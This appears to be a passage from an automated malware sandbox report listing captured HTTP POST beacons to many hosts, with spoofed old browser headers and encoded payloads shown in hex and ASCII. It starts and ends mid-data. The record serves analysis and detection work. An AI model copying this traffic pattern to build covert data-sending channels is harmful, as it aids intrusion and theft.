a64QkQ4Q32c+vcLimViG9HHIZsgOsz8jIqls3HkQOKe10MmGx1gg3+zfy1TmV4MrUap3uFTmlKLcmiY0trSUR3ZTBDDCVcns6iaIUi6qQ266s59lDPKicbV7AzfedQJd2hcQPIEgTh20sh6X7bDrxDQwwsjMlUk3blFj70VW/8GWOmuIhevkmsAm7vI4aslBzxK+o2ornKjADGnyp7lslCUllOo2QkB9ykhWIIpEL9kf1rcSood0R/nPtCPxVIAZzFQn81tnQBm0DEuu1n4KIAm5H54PR+Ay1l81uqToapBbLaWP+VIzGgpbGZojnp0QLv2NTXcp01dOMtfLDr0fRMC9AwqgLwd4fu+e1Gv98QspqFV01u6iQsCSpbn8212hhG4dENuLAtM9LbFEdjDbacjIEwqAip1WlWctBy+7Cycs+mXc7DYI/OLDJk5YeNcdF4xJjqCS6vqlc+ZaJXos7pzSeeIxlYfU/KK9o5XXw8ZJA8iOd0x/E64Y/4rEzHyLYAnsjEwogSXgpbCatDMbgpFZ6MGGdI4nzlE0Hk+3bV2Y
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.c9dd.comCache-Control: no-cacheData Raw: 74 31 6a 4d 67 75 73 35 37 32 63 6a 35 6b 32 71 77 6f 61 62 66 46 54 62 64 61 57 78 73 6b 2f 52 54 34 72 50 43 59 32 38 7a 6f 4f 58 45 66 49 58 32 4d 4b 55 6e 4a 6f 78 45 69 38 41 6c 62 71 38 4c 77 77 2b 4d 46 65 53 47 67 43 53 66 47 6f 37 38 35 4e 54 42 54 68 58 33 56 75 42 66 78 42 6a 2b 56 45 65 76 50 72 53 65 2f 44 30 66 35 47 4f 59 30 6f 70 55 75 30 73 6c 69 7a 48 52 4e 77 35 4f 50 68 69 6e 68 57 58 6c 2f 42 44 6d 64 66 37 62 6e 34 4c 64 56 32 4e 6b 34 4b 6e 6f 70 62 44 62 4a 78 30 32 67 66 75 7a 50 35 56 63 58 79 4f 78 66 50 54 71 74 72 6f 4e 36 35 43 4b 74 51 44 46 30 2b 2f 44 73 69 71 31 50 77 66 31 36 56 72 6a 6f 56 43 55 51 44 30 6c 6f 79 2b 63 44 67 4a 45 2b 66 31 36 4d 6e 51 54 79 38 6f 78 38 2b 39 4f 6e 68 6f 6e 77 70 50 69 5a 39 32 39 37 6e 45 72 47 56 49 79 38 72 50 4d 7a 4b 70 73 4e 59 65 62 46 30 57 4f 64 78 4f 50 64 39 74 30 74 64 6c 56 75 70 52 4b 79 4b 5a 71 75 39 30 48 2b 48 68 75 78 37 4f 36 32 68 58 30 39 51 6c 59 46 68 77 5a 38 4a 4d 76 73 39 67 66 46 4c 42 49 73 57 56 4f 6a 48 46 51 63 50 46 2b 54 30 55 77 6f 35 76 64 5a 5a 65 43 69 6e 31 57 2b 43 59 45 67 32 47 6f 72 6a 4d 31 77 6a 64 62 78 2b 50 55 42 6d 41 35 46 6a 46 4d 5a 31 6c 76 56 74 6f 6e 4c 4d 4f 2b 61 75 32 50 71 33 76 51 65 31 76 78 39 32 42 64 53 78 44 4f 56 57 70 77 50 34 62 6c 53 7a 6a 6b 4f 56 73 77 5a 63 52 30 41 44 34 64 57 7a 68 50 47 5a 6d 54 66 49 38 71 65 41 6c 44 75 42 67 34 72 79 2f 56 72 70 65 6d 59 33 6a 41 72 55 70 71 54 36 43 55 73 68 62 4a 4b 67 77 2b 74 6f 54 58 47 5a 51 6b 54 41 6d 4e 42 39 78 65 55 37 43 35 7a 73 64 6c 78 70 4f 72 56 61 73 77 34 44 48 65 42 52 44 2b 78 78 46 77 53 32 49 42 51 3d 3d Data Ascii: t1jMgus572cj5k2qwoabfFTbdaWxsk/RT4rPCY28zoOXEfIX2MKUnJoxEi8Albq8Lww+MFeSGgCSfGo785NTBThX3VuBfxBj+VEevPrSe/D0f5GOY0opUu0slizHRNw5OPhinhWXl/BDmdf7bn4LdV2Nk4KnopbDbJx02gfuzP5VcXyOxfPTqtroN65CKtQDF0+/Dsiq1Pwf16VrjoVCUQD0loy+cDgJE+f16MnQTy8ox8+9OnhonwpPiZ9297nErGVIy8rPMzKpsNYebF0WOdxOPd9t0tdlVupRKyKZqu90H+Hhux7O62hX09QlYFhwZ8JMvs9gfFLBIsWVOjHFQcPF+T0Uwo5vdZZeCin1W+CYEg2GorjM1wjdbx+PUBmA5FjFMZ1lvVtonLMO+au2Pq3vQe1vx92BdSxDOVWpwP4blSzjkOVswZcR0AD4dWzhPGZmTfI8qeAlDuBg4ry/VrpemY3jArUpqT6CUshbJKgw+toTXGZQkTAmNB9xeU7C5zsdlxpOrVasw4DHeBRD+xxFwS2IBQ==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.lrsuk.comCache-Control: no-cacheData Raw: 79 6e 63 55 46 59 64 5a 34 32 65 61 75 52 53 71 74 6b 6e 56 31 6c 44 46 47 6b 64 39 4d 42 37 37 71 33 31 57 75 44 38 47 71 65 43 51 73 53 35 4e 79 49 31 30 51 5a 64 4c 35 51 4b 2f 4b 69 79 55 47 49 73 65 73 58 55 74 48 4a 57 77 6c 44 6a 75 39 38 4b 33 32 4c 71 34 6d 6b 35 4f 57 7a 42 70 46 71 42 63 53 41 6d 6b 52 52 6a 6e 4a 42 56 55 33 5a 6c 69 63 77 35 47 48 63 54 48 56 30 42 6d 44 52 55 5a 73 79 61 76 52 5a 62 73 39 44 4d 78 5a 74 6c 43 33 6a 42 34 70 71 4e 34 33 69 73 37 6b 66 6a 39 51 6d 63 42 38 67 4a 47 75 38 31 7a 56 45 72 72 36 62 51 4f 4d 64 35 78 32 6d 44 33 4e 34 79 6e 4d 66 6c 2b 45 2f 57 37 78 55 7a 4d 4f 58 51 6f 76 55 71 2b 61 6a 4a 34 62 79 4f 55 4b 7a 41 79 2b 74 63 74 4e 41 4b 62 58 63 64 71 5a 75 4d 36 6d 77 33 36 4a 71 4b 74 41 63 4b 47 6d 39 38 4c 65 4a 71 47 62 55 66 31 35 41 74 30 4a 49 7a 71 34 71 6c 6e 43 65 6d 34 6f 36 75 4b 51 79 6f 47 31 52 35 6a 62 56 63 47 49 69 7a 32 41 77 67 49 32 46 75 2f 58 74 66 64 6b 72 2f 30 67 47 59 70 45 6a 47 45 53 68 6f 67 76 4a 6a 4b 66 6f 47 65 66 4e 77 36 48 63 4a 6e 4e 42 61 4f 78 79 2b 41 49 76 71 63 73 73 37 34 41 31 4b 51 48 6a 33 5a 77 78 56 75 37 78 49 39 53 48 35 36 54 6c 5a 30 30 2b 37 4f 32 33 55 75 6e 4f 4a 59 76 53 65 44 34 39 75 52 4d 71 42 42 32 62 32 6a 54 57 79 55 79 30 73 73 78 2f 30 74 61 46 4b 6d 6f 34 70 32 6b 75 4e 52 7a 65 72 6e 42 37 75 74 42 62 46 53 63 6e 35 66 36 47 4b 69 6d 31 4b 30 33 72 70 37 74 37 35 72 54 33 4c 6f 62 61 34 55 32 6c 64 39 61 4b 7a 43 51 77 6d 4c 78 6d 6d 4c 34 49 77 76 73 48 33 64 56 64 30 34 46 64 4c 4f 4d 72 34 72 77 33 73 6f 46 67 37 74 4b 44 35 51 53 44 4b 75 46 58 6a 79 43 77 3d 3d Data Ascii: yncUFYdZ42eauRSqtknV1lDFGkd9MB77q31WuD8GqeCQsS5NyI10QZdL5QK/KiyUGIsesXUtHJWwlDju98K32Lq4mk5OWzBpFqBcSAmkRRjnJBVU3Zlicw5GHcTHV0BmDRUZsyavRZbs9DMxZtlC3jB4pqN43is7kfj9QmcB8gJGu81zVErr6bQOMd5x2mD3N4ynMfl+E/W7xUzMOXQovUq+ajJ4byOUKzAy+tctNAKbXcdqZuM6mw36JqKtAcKGm98LeJqGbUf15At0JIzq4qlnCem4o6uKQyoG1R5jbVcGIiz2AwgI2Fu/Xtfdkr/0gGYpEjGEShogvJjKfoGefNw6HcJnNBaOxy+AIvqcss74A1KQHj3ZwxVu7xI9SH56TlZ00+7O23UunOJYvSeD49uRMqBB2b2jTWyUy0ssx/0taFKmo4p2kuNRzernB7utBbFScn5f6GKim1K03rp7t75rT3Loba4U2ld9aKzCQwmLxmmL4IwvsH3dVd04FdLOMr4rw3soFg7tKD5QSDKuFXjyCw==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nqks.comCache-Control: no-cacheData Raw: 69 51 79 30 67 69 41 35 37 32 63 72 59 6d 64 47 63 35 6c 33 61 46 4e 64 78 44 75 49 48 6d 54 53 56 43 6f 6b 68 70 53 57 35 50 46 48 38 69 4e 39 67 6f 74 52 4f 46 49 68 38 5a 4a 76 71 39 35 39 64 39 46 31 42 4c 4f 70 33 58 76 70 5a 2f 36 4f 35 51 6d 67 4e 6b 38 59 52 69 4e 6c 77 77 38 44 66 42 47 38 48 56 66 4f 79 33 7a 75 6b 51 73 6f 73 79 53 6b 32 46 6a 6b 61 4f 75 4c 30 4a 2f 63 71 70 34 35 33 36 57 69 4f 50 45 33 4f 36 31 39 57 76 77 34 36 4e 45 62 7a 77 6b 46 66 77 7a 55 4e 44 2f 48 32 74 53 52 63 41 43 4b 66 37 62 6a 57 36 32 76 4a 74 4f 78 58 31 43 56 63 50 59 6d 51 76 48 39 65 52 4a 65 42 73 51 41 44 65 64 55 4c 67 43 59 4e 63 6c 4b 51 46 69 6e 69 66 6b 6a 78 6c 44 74 32 59 57 6d 7a 6c 44 73 54 37 53 2f 42 32 64 37 37 4b 42 4b 68 35 33 4e 51 4c 76 4a 35 32 64 44 51 61 76 38 46 79 79 2f 6a 78 4d 68 79 33 69 35 64 61 45 76 53 77 52 51 49 36 36 4d 37 72 78 52 7a 70 70 71 38 63 57 65 58 33 7a 62 64 6d 65 79 45 30 36 78 36 71 62 69 78 56 62 51 38 7a 51 2b 77 70 62 64 59 6e 64 6e 4c 4f 7a 68 32 58 62 43 67 76 34 6f 51 6d 74 6c 65 6e 6f 35 47 72 33 70 42 71 2b 43 4b 65 64 6d 2b 6b 50 5a 41 6b 39 6e 2f 51 4a 45 53 51 4a 42 6e 5a 59 6f 50 67 55 47 6a 33 61 4b 51 73 6b 7a 39 50 33 37 32 2f 63 70 56 6d 62 7a 70 4e 46 49 37 32 35 64 68 36 51 46 57 68 41 72 6a 44 61 50 68 51 2b 64 63 4c 73 79 4a 31 74 79 31 75 54 53 51 37 72 66 41 65 32 79 69 44 48 56 49 65 4f 36 4f 49 74 36 7a 6e 45 6f 54 6a 32 47 43 30 66 59 4d 36 79 66 56 75 65 62 6c 48 33 70 4e 52 74 56 74 2b 51 70 4b 6c 38 72 61 74 51 64 71 64 6c 72 42 6c 6f 44 5a 57 46 66 51 74 68 55 79 50 75 33 52 6d 72 75 57 6c 45 56 4a 72 54 4d 55 48 6c 44 6d 67 2f 58 63 30 6f 3d Data Ascii: iQy0giA572crYmdGc5l3aFNdxDuIHmTSVCokhpSW5PFH8iN9gotROFIh8ZJvq959d9F1BLOp3XvpZ/6O5QmgNk8YRiNlww8DfBG8HVfOy3zukQsosySk2FjkaOuL0J/cqp4536WiOPE3O619Wvw46NEbzwkFfwzUND/H2tSRcACKf7bjW62vJtOxX1CVcPYmQvH9eRJeBsQADedULgCYNclKQFinifkjxlDt2YWmzlDsT7S/B2d77KBKh53NQLvJ52dDQav8Fyy/jxMhy3i5daEvSwRQI66M7rxRzppq8cWeX3zbdmeyE06x6qbixVbQ8zQ+wpbdYndnLOzh2XbCgv4oQmtleno5Gr3pBq+CKedm+kPZAk9n/QJESQJBnZYoPgUGj3aKQskz9P372/cpVmbzpNFI725dh6QFWhArjDaPhQ+dcLsyJ1ty1uTSQ7rfAe2yiDHVIeO6OIt6znEoTj2GC0fYM6yfVueblH3pNRtVt+QpKl8ratQdqdlrBloDZWFfQthUyPu3RmruWlEVJrTMUHlDmg/Xc0o=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.mobilnic.netCache-Control: no-cacheData Raw: 64 61 76 65 69 4f 7a 4c 33 6d 66 57 61 59 5a 57 31 31 59 4c 4d 76 2b 56 54 62 70 45 74 37 78 30 34 47 4f 34 4f 50 30 51 42 42 57 58 5a 39 6e 32 63 65 48 74 73 54 6d 62 45 61 42 57 6a 51 74 2b 45 39 6c 44 73 30 6a 55 73 6d 6a 59 6b 6e 6a 6b 51 43 78 6c 79 41 6a 6f 54 76 57 39 55 71 37 79 6b 38 36 65 46 31 67 4d 74 58 32 70 4a 55 4f 31 31 69 34 66 32 77 48 57 74 74 33 53 4c 74 46 67 32 78 5a 2b 66 6c 53 4e 6b 39 63 30 34 48 31 46 4b 35 78 32 6d 4f 71 63 31 68 44 51 4e 62 6b 59 47 49 36 4b 77 56 2f 6a 57 50 37 55 6b 57 67 6f 6c 2b 75 56 2f 57 65 41 36 75 74 53 32 76 72 4e 51 41 64 68 38 4a 69 45 5a 55 43 67 78 4f 32 38 50 41 45 61 76 33 41 38 6b 53 34 4c 4a 61 45 6a 6b 79 6a 6f 6d 6e 33 62 4c 6a 73 58 45 46 4c 57 35 61 53 76 77 67 35 37 79 6b 39 72 71 72 4a 63 39 76 39 35 2f 4e 62 57 36 54 76 6b 63 55 6a 73 51 57 6e 76 4b 2f 4a 78 48 5a 72 59 4a 4c 79 62 31 48 78 53 32 4a 76 50 55 58 64 6f 2f 6b 4a 71 52 37 6c 67 77 76 67 56 4e 6e 62 65 5a 42 45 41 46 68 42 67 66 37 4f 55 68 32 50 6a 53 2f 63 67 67 6c 34 78 41 48 35 68 56 6b 4f 58 67 46 47 6e 4d 34 62 57 61 78 58 6c 57 56 69 69 38 4c 79 4d 34 31 51 54 37 6e 58 4b 32 65 6e 62 4a 65 49 4e 2b 32 39 76 4b 43 52 37 61 59 62 69 75 4c 65 37 6f 73 2f 30 51 4a 78 53 2b 30 4b 61 4d 4f 6f 75 6d 79 4a 75 38 7a 33 41 67 2f 2b 78 72 61 78 6d 4f 2b 75 78 39 6c 72 4b 73 50 6f 32 46 49 78 6a 30 4c 79 61 53 39 69 47 4c 55 52 53 41 59 66 38 76 58 45 55 47 2f 42 54 78 59 59 4c 65 74 44 76 6b 67 2b 48 4a 65 32 62 69 52 42 56 57 69 52 55 5a 5a 36 51 37 34 7a 70 4a 50 4a 69 38 6b 78 74 78 69 6b 59 33 75 68 66 6a 66 70 35 62 76 52 77 33 47 79 62 77 6c 35 35 4e 6a 53 56 42 41 75 48 37 37 45 30 2f 7a 39 35 32 4d 76 57 51 49 52 4b 49 68 56 54 42 55 32 4c 62 30 66 7a 6b 37 57 45 53 47 32 35 50 46 5a 68 48 4a 44 44 44 69 4d 3d Data Ascii: daveiOzL3mfWaYZW11YLMv+VTbpEt7x04GO4OP0QBBWXZ9n2ceHtsTmbEaBWjQt+E9lDs0jUsmjYknjkQCxlyAjoTvW9Uq7yk86eF1gMtX2pJUO11i4f2wHWtt3SLtFg2xZ+flSNk9c04H1FK5x2mOqc1hDQNbkYGI6KwV/jWP7UkWgol+uV/WeA6utS2vrNQAdh8JiEZUCgxO28PAEav3A8kS4LJaEjkyjomn3bLjsXEFLW5aSvwg57yk9rqrJc9v95/NbW6TvkcUjsQWnvK/JxHZrYJLyb1HxS2JvPUXdo/kJqR7lgwvgVNnbeZBEAFhBgf7OUh2PjS/cggl4xAH5hVkOXgFGnM4bWaxXlWVii8LyM41QT7nXK2enbJeIN+29vKCR7aYbiuLe7os/0QJxS+0KaMOoumyJu8z3Ag/+xraxmO+ux9lrKsPo2FIxj0LyaS9iGLURSAYf8vXEUG/BTxYYLetDvkg+HJe2biRBVWiRUZZ6Q74zpJPJi8kxtxikY3uhfjfp5bvRw3Gybwl55NjSVBAuH77E0/z952MvWQIRKIhVTBU2Lb0fzk7WESG25PFZhHJDDDiM=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.cel-cpa.comCache-Control: no-cacheData Raw: 61 36 34 51 6b 51 34 51 33 32 63 2b 76 63 4c 69 6d 56 69 47 39 48 48 49 5a 73 67 4f 73 7a 38 6a 49 71 6c 73 33 48 6b 51 4f 4b 65 31 30 4d 6d 47 78 31 67 67 33 2b 7a 66 79 31 54 6d 56 34 4d 72 55 61 70 33 75 46 54 6d 6c 4b 4c 63 6d 69 59 30 74 72 53 55 52 33 5a 54 42 44 44 43 56 63 6e 73 36 69 61 49 55 69 36 71 51 32 36 36 73 35 39 6c 44 50 4b 69 63 62 56 37 41 7a 66 65 64 51 4a 64 32 68 63 51 50 49 45 67 54 68 32 30 73 68 36 58 37 62 44 72 78 44 51 77 77 73 6a 4d 6c 55 6b 33 62 6c 46 6a 37 30 56 57 2f 38 47 57 4f 6d 75 49 68 65 76 6b 6d 73 41 6d 37 76 49 34 61 73 6c 42 7a 78 4b 2b 6f 32 6f 72 6e 4b 6a 41 44 47 6e 79 70 37 6c 73 6c 43 55 6c 6c 4f 6f 32 51 6b 42 39 79 6b 68 57 49 49 70 45 4c 39 6b 66 31 72 63 53 6f 6f 64 30 52 2f 6e 50 74 43 50 78 56 49 41 5a 7a 46 51 6e 38 31 74 6e 51 42 6d 30 44 45 75 75 31 6e 34 4b 49 41 6d 35 48 35 34 50 52 2b 41 79 31 6c 38 31 75 71 54 6f 61 70 42 62 4c 61 57 50 2b 56 49 7a 47 67 70 62 47 5a 6f 6a 6e 70 30 51 4c 76 32 4e 54 58 63 70 30 31 64 4f 4d 74 66 4c 44 72 30 66 52 4d 43 39 41 77 71 67 4c 77 64 34 66 75 2b 65 31 47 76 39 38 51 73 70 71 46 56 30 31 75 36 69 51 73 43 53 70 62 6e 38 32 31 32 68 68 47 34 64 45 4e 75 4c 41 74 4d 39 4c 62 46 45 64 6a 44 62 61 63 6a 49 45 77 71 41 69 70 31 57 6c 57 63 74 42 79 2b 37 43 79 63 73 2b 6d 58 63 37 44 59 49 2f 4f 4c 44 4a 6b 35 59 65 4e 63 64 46 34 78 4a 6a 71 43 53 36 76 71 6c 63 2b 5a 61 4a 58 6f 73 37 70 7a 53 65 65 49 78 6c 59 66 55 2f 4b 4b 39 6f 35 58 58 77 38 5a 4a 41 38 69 4f 64 30 78 2f 45 36 34 59 2f 34 72 45 7a 48 79 4c 59 41 6e 73 6a 45 77 6f 67 53 58 67 70 62 43 61 74 44 4d 62 67 70 46 5a 36 4d 47 47 64 49 34 6e 7a 6c 45 30 48 6b 2b 33 62 56 32 59 Data Ascii: a64QkQ4Q32c+vcLimViG9HHIZsgOsz8jIqls3HkQOKe10MmGx1gg3+zfy1TmV4MrUap3uFTmlKLcmiY0trSUR3ZTBDDCVcns6iaIUi6qQ266s59lDPKicbV7AzfedQJd2hcQPIEgTh20sh6X7bDrxDQwwsjMlUk3blFj70VW/8GWOmuIhevkmsAm7vI4aslBzxK+o2ornKjADGnyp7lslCUllOo2QkB9ykhWIIpEL9kf1rcSood0R/nPtCPxVIAZzFQn81tnQBm0DEuu1n4KIAm5H54PR+Ay1l81uqToapBbLaWP+VIzGgpbGZojnp0QLv2NTXcp01dOMtfLDr0fRMC9AwqgLwd4fu+e1Gv98QspqFV01u6iQsCSpbn8212hhG4dENuLAtM9LbFEdjDbacjIEwqAip1WlWctBy+7Cycs+mXc7DYI/OLDJk5YeNcdF4xJjqCS6vqlc+ZaJXos7pzSeeIxlYfU/KK9o5XXw8ZJA8iOd0x/E64Y/4rEzHyLYAnsjEwogSXgpbCatDMbgpFZ6MGGdI4nzlE0Hk+3bV2Y
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.kernsafe.comCache-Control: no-cacheData Raw: 79 55 55 37 35 31 30 64 41 32 6a 43 6d 48 51 67 6c 48 39 66 6f 4a 62 31 51 39 63 4c 32 45 64 74 34 58 73 77 69 74 42 39 4a 6e 51 43 39 4f 5a 4f 2b 65 78 36 4e 4f 4e 74 4c 63 63 6b 52 41 33 34 76 4f 4e 65 4d 71 76 74 56 36 67 46 62 66 36 65 4d 49 66 76 4e 4a 6a 73 43 57 4b 72 77 43 74 6f 31 75 5a 4d 69 2b 6f 5a 59 39 61 4d 56 68 79 64 71 69 4e 52 4e 43 73 52 52 65 79 42 67 6f 77 79 5a 53 41 4b 50 61 42 39 66 7a 6b 43 55 62 75 6b 6d 67 50 6d 78 4d 62 68 58 33 2b 34 4f 36 74 34 45 5a 4c 79 76 5a 62 73 33 36 6b 57 54 44 32 74 6b 4f 49 68 44 43 66 35 31 68 74 6d 6a 67 66 35 33 54 77 4c 55 33 62 58 6c 68 6f 62 6a 65 48 4e 46 44 4a 48 5a 6d 77 35 64 56 42 73 2b 65 6f 57 49 48 34 65 66 62 4b 2b 62 34 51 64 4f 64 36 70 71 73 69 77 78 59 4d 33 56 30 35 33 66 76 77 59 4d 4f 66 68 6a 77 42 62 33 4c 43 30 46 79 43 33 79 6b 54 78 74 55 4f 4f 2f 33 46 43 4e 74 61 42 4f 63 36 71 74 4b 4c 47 74 70 4b 63 32 58 6a 6d 38 58 36 66 65 34 65 66 57 79 35 6b 79 30 44 2b 77 47 6d 4c 4c 78 4e 66 61 77 37 48 47 56 44 73 42 76 34 35 53 6e 31 43 4d 64 4d 59 38 34 48 6e 59 44 39 51 4d 31 74 68 45 45 61 56 59 6a 38 58 77 37 50 41 36 44 34 2f 4c 35 4e 56 6a 59 68 6e 41 2b 34 59 6e 4c 54 51 36 5a 39 55 6a 73 70 34 50 54 59 63 78 46 31 38 35 73 6c 47 37 48 76 2b 77 43 30 59 4d 57 54 41 2b 6c 61 53 57 45 46 33 41 62 4e 39 79 30 5a 44 4a 48 74 68 6a 6d 73 74 37 66 79 42 38 39 6f 75 50 38 7a 33 41 4d 31 6a 34 56 45 35 45 72 34 51 75 61 4a 44 4c 45 38 71 65 71 69 47 66 31 32 57 48 71 45 79 5a 45 62 43 36 48 62 6e 54 70 69 69 4f 50 69 43 67 78 33 33 67 45 59 65 63 31 7a 32 76 61 39 53 6a 41 67 38 32 2f 4a 35 56 31 65 78 7a 4b 6c 66 36 48 34 3d Data Ascii: yUU7510dA2jCmHQglH9foJb1Q9cL2Edt4XswitB9JnQC9OZO+ex6NONtLcckRA34vONeMqvtV6gFbf6eMIfvNJjsCWKrwCto1uZMi+oZY9aMVhydqiNRNCsRReyBgowyZSAKPaB9fzkCUbukmgPmxMbhX3+4O6t4EZLyvZbs36kWTD2tkOIhDCf51htmjgf53TwLU3bXlhobjeHNFDJHZmw5dVBs+eoWIH4efbK+b4QdOd6pqsiwxYM3V053fvwYMOfhjwBb3LC0FyC3ykTxtUOO/3FCNtaBOc6qtKLGtpKc2Xjm8X6fe4efWy5ky0D+wGmLLxNfaw7HGVDsBv45Sn1CMdMY84HnYD9QM1thEEaVYj8Xw7PA6D4/L5NVjYhnA+4YnLTQ6Z9Ujsp4PTYcxF185slG7Hv+wC0YMWTA+laSWEF3AbN9y0ZDJHthjmst7fyB89ouP8z3AM1j4VE5Er4QuaJDLE8qeqiGf12WHqEyZEbC6HbnTpiiOPiCgx33gEYec1z2va9SjAg82/J5V1exzKlf6H4=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dayvo.comCache-Control: no-cacheData Raw: 4c 65 53 44 36 41 67 6f 41 32 69 4d 36 2f 78 47 53 79 74 54 72 33 74 30 69 49 32 51 2b 33 74 64 76 4a 4f 71 6f 52 38 64 64 67 43 6e 73 32 35 4a 6a 33 36 4a 32 56 66 43 46 42 65 4a 77 64 46 43 76 56 73 37 76 43 76 67 45 5a 65 71 63 68 55 4a 71 73 6a 54 66 51 74 52 41 34 61 48 50 79 6b 72 66 2b 46 2f 68 79 4d 37 41 6f 30 35 6c 71 32 49 6c 48 50 69 6b 66 56 31 71 34 73 47 42 75 64 4f 30 42 68 36 66 66 37 30 32 54 69 72 35 6b 67 47 64 55 55 33 2f 4d 73 44 4d 6f 4d 36 41 62 5a 33 53 32 76 33 57 54 79 67 4f 4f 75 35 6b 37 62 6c 77 2f 78 43 53 54 52 61 7a 37 39 48 38 68 6a 48 56 73 50 6f 57 4a 39 32 6e 62 65 6d 47 6b 59 6a 66 50 70 71 38 57 63 4b 6d 67 70 66 77 2f 45 4b 30 54 30 57 46 69 4d 64 4e 49 41 79 72 6a 63 54 51 47 69 43 44 4a 48 73 45 48 2b 4f 74 57 4d 73 2b 61 53 7a 78 4a 65 38 45 34 33 58 78 65 66 57 75 72 76 31 4d 76 69 67 6f 63 51 68 66 2f 77 45 36 52 2f 38 4c 30 63 74 75 4d 6e 47 6c 6c 72 6b 37 78 6e 35 61 54 7a 78 70 53 64 57 53 6a 49 47 47 51 6e 57 2f 63 44 38 64 42 66 6a 74 37 75 58 34 62 5a 51 48 71 64 46 32 75 4d 49 49 61 66 31 35 67 58 64 59 6e 46 58 74 65 65 62 2b 31 51 56 62 6d 65 77 67 72 46 33 2b 65 5a 79 55 75 47 39 75 47 59 74 6f 4f 42 59 4d 41 50 6b 4d 4a 73 45 2b 78 52 49 62 37 2f 78 6c 39 4d 7a 70 30 45 4d 35 6b 74 4c 43 51 4d 65 4a 56 58 4e 34 6b 54 36 51 43 67 66 61 4a 36 2b 2f 6b 68 6d 43 4e 46 42 2f 55 59 52 45 79 4c 33 4b 54 6b 6f 53 52 51 57 50 4b 42 31 41 4b 52 54 37 76 79 59 42 4f 74 65 39 67 74 6a 4c 6a 4d 6b 73 44 73 52 4f 57 6a 6d 33 64 71 2b 72 37 50 47 2f 61 64 65 64 54 2b 50 36 39 36 34 4b 5a 2f 67 4b 53 73 46 5a 74 51 50 64 71 4e 37 61 55 52 31 58 6c 33 33 38 64 44 74 62 52 61 48 6b 32 68 55 58 32 4e 4d 32 54 4c 41 45 79 76 52 2b 30 4d 6b 34 72 64 63 59 52 78 51 66 6a 53 66 Data Ascii: LeSD6AgoA2iM6/xGSytTr3t0iI2Q+3tdvJOqoR8ddgCns25Jj36J2VfCFBeJwdFCvVs7vCvgEZeqchUJqsjTfQtRA4aHPykrf+F/hyM7Ao05lq2IlHPikfV1q4sGBudO0Bh6ff702Tir5kgGdUU3/MsDMoM6AbZ3S2v3WTygOOu5k7blw/xCSTRaz79H8hjHVsPoWJ92nbemGkYjfPpq8WcKmgpfw/EK0T0WFiMdNIAyrjcTQGiCDJHsEH+OtWMs+aSzxJe8E43XxefWurv1MvigocQhf/wE6R/8L0ctuMnGllrk7xn5aTzxpSdWSjIGGQnW/cD8dBfjt7uX4bZQHqdF2uMIIaf15gXdYnFXteeb+1QVbmewgrF3+eZyUuG9uGYtoOBYMAPkMJsE+xRIb7/xl9Mzp0EM5ktLCQMeJVXN4kT6QCgfaJ6+/khmCNFB/UYREyL3KTkoSRQWPKB1AKRT7vyYBOte9gtjLjMksDsROWjm3dq+r7PG/adedT+P6964KZ/gKSsFZtQPdqN7aUR1Xl338dDtbRaHk2hUX2NM2TLAEyvR+0Mk4rdcYRxQfjSf
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.domon.comCache-Control: no-cacheData Raw: 53 4d 5a 75 36 76 63 33 41 32 67 6a 30 4b 57 48 5a 6a 51 45 52 45 44 64 6c 49 69 74 52 30 74 4b 47 30 4d 4b 6e 2f 59 51 6a 52 68 71 55 48 2b 68 41 41 55 69 2b 6c 5a 65 78 38 6c 75 76 5a 2b 34 55 50 76 78 34 5a 42 7a 68 6c 71 5a 79 71 57 76 58 53 2b 58 54 75 2b 37 45 44 39 58 36 44 42 47 71 4e 2f 48 4f 2b 4f 57 30 41 30 77 57 79 44 76 4f 30 73 33 56 67 4e 76 62 2b 62 2f 66 47 77 30 67 36 35 74 59 51 39 77 43 49 62 30 41 57 42 59 49 69 67 67 47 4b 56 44 4b 45 2f 2f 70 45 41 75 53 5a 44 56 43 46 45 4e 56 45 36 53 6e 36 6b 58 67 5a 63 78 76 51 72 76 59 50 4e 4e 50 54 32 73 31 59 4d 50 6e 37 6a 4e 6a 51 52 4b 74 2f 6f 45 71 55 74 52 47 53 6b 74 6b 32 41 49 48 73 33 49 69 6a 78 34 49 66 7a 45 78 74 42 56 73 32 32 74 64 42 5a 6e 63 6a 64 73 46 65 73 64 6e 32 39 2b 64 70 77 51 2b 63 30 2f 6f 79 4d 39 6a 70 31 79 2f 33 7a 6c 55 38 39 34 35 6d 56 76 58 74 6b 4d 31 78 67 51 70 73 6b 35 6c 69 73 6a 75 46 44 69 71 38 61 45 49 69 53 2b 5a 7a 73 35 55 41 38 69 69 48 39 42 48 65 4a 30 51 47 65 59 6c 32 4f 77 58 36 79 55 65 50 73 6f 76 4f 68 31 2f 54 61 47 79 39 72 38 38 36 76 68 6c 50 57 6a 4d 77 52 6d 48 37 39 6e 57 4e 42 69 32 4f 61 6c 63 